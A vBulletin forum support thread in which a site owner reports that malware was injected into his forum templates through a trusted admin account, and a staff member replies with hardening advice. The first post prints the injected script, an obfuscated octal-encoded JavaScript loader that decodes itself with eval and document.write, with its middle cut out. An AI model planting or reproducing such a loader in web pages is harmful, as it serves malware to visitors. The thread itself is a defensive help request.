Announcement

Collapse
No announcement yet.

Code Injected

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Code Injected

    I was lazy, so the fault was mine. I was still using 3.8.0 and somehow, someone injected malware into my forum using an existing admin account on the forum home template of every style. This caused a popup ActiveX control prompt that was linked to a site that firefox wouldnt let me view because it was a known malware site.

    Here is the code:

    Code:
    <script language="javascript">
    MaIlMe=new Array();
    MaIlMe[0]="045063103110124115114045063105045060101045063103110105101104045063";
    MaIlMe[1]="105045060101045063103163143162151160164045063105045060101";
    MaIlMe[2]="166141162045062060144143045063104144157143165155145156164056";
    MaIlMe[3]="167162151164145045063102045060101166141162045062060163143";
    ----code removed for size constraints---------
    MaIlMe[754]="103061061066045062103066062045062071045062071045063102045060";
    MaIlMe[755]="101045063103057163143162151160164045063105045060101045060101";
    OutString="";for(i=0;i<MaIlMe.length;i++){
    for(j=0;j<MaIlMe[i].length;j+=3){
    OutString+=eval("\"\\"+MaIlMe[i].slice(j,j+3)+"\"");
    }}document.write(unescape(OutString));</script>
    Im not sure how this was done or what I could have done to stop it. I KNOW the account that was used was a trusted one, my business partner. Is there anything I can do to further protect my site, other than update, which I have done? If you need the full code, I have it also, but didnt think it was necessary to post here.

  • #2
    Moved to the appropriate forum as this is not a suggestion.

    Its expected and anticipated that adminstrators will be entering HTML into templates. This is a required function to have vBulletin work and be customizable. What you need to do is secure your vBulletin installation so only those people who require access have access to sensitive locations.

    See:
    http://www.vbulletin.com/forum/showthread.php?t=194701

    As it is now, all staff should be forced to change their passwords including your business partner and yourself. The Admin CP should be secured. It is recommended that passwords are at least 12 characters long and contain letters in both cases as well as numbers and standard punctuation. The more variety the better.

    This site generates decent passwords:
    http://www.techzoom.net/tools/password-generator.en

    There is also a password generator built-in to newer versions of cPanel that is quite good.
    Translations provided by Google.

    Wayne Luke
    The Rabid Badger - a vBulletin Cloud demonstration site.
    vBulletin 5 API - Full / Mobile
    Vote for your favorite feature requests and the bugs you want to see fixed.

    Comment

    widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
    Working...
    X